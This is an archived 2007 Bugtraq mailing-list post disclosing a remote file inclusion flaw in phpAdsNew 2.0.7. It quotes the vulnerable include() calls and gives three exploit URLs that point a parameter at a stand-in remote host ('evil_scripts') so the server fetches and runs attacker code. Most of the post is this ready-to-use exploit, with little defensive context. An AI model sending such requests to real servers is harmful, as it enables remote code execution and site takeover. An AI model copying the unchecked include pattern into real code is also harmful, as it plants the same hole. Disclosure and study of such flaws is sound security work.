lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <20070120182204.92BF0B0FEF@ws4-4.us4.outblaze.com>
Date: Sun, 21 Jan 2007 02:22:04 +0800
From: "mr alkomandoz" <k3g@...kermail.com>
To: str0ke@...w0rm.com
Cc: bugtraq@...urityfocus.com
Subject: phpAdsNew 2.0.7 Remote File Include




-----------------------------------------------

phpAdsNew 2.0.7 Remote File Include

-----------------------------------------------


Author: Alk()mand()z

-----------------------------------------------
 
Vuln Code:

include_once ($phpAds_geoPlugin);

.......................

function phpAds_ReportGetPluginInfo($filename)
{
	include ($filename);
	return  ($plugin_info_function());
..........................

include ($phpAds_config['my_footer']);


-----------------------------------------------

3xplo!t:


phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=http://evil_scripts?

phpAdsNew-2.0.7/admin/report-index?filename=http://evil_scripts?

phpAdsNew-2.0.7/admin/lib-gui.inc?$phpAds_config['my_footer']=http://evil_scripts?



-----------------------------------------------

download:  http://switch.dl.sourceforge.net/sourceforge/phpadsnew/phpAdsNew-2.0.7.zip

-----------------------------------------------


Greetz: KaBaRa, SpY0zErO, aG-SpIdEr - TOoOoFa -LoGiC-BoMb - MiRo-TiGeR

SpeciaL GreeTz : AsB-MaY-GrOuPs & A-S-T -Team



                                                    ################################################### 
          
           AsB-MaT.NeT & D4eG.OrG
                                              ###################################################




-- 
_______________________________________________
Get your free email from http://www.hackermail.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ